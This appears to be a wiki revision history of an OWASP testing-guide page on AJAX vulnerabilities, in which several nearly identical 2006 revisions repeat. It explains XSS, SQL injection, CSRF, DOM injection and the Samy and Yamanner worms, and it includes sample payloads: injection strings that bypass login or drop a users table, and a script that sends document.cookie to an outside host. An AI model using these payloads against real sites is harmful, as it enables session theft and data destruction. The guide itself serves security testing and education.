*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:46:09Z

Anushshetty: /* Testing Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:39:59Z

Anushshetty: /* Testing */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:38:33Z

Anushshetty: /* Testing */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_How_to_test_AoC | How to Test AJAX]] 
[[AJAX_Testing_AoC | AJAX Testing ]] 

== Testing Tools ==
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' Ghost Train is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' JsUnit is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:32:24Z

Anushshetty: /* Testing */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
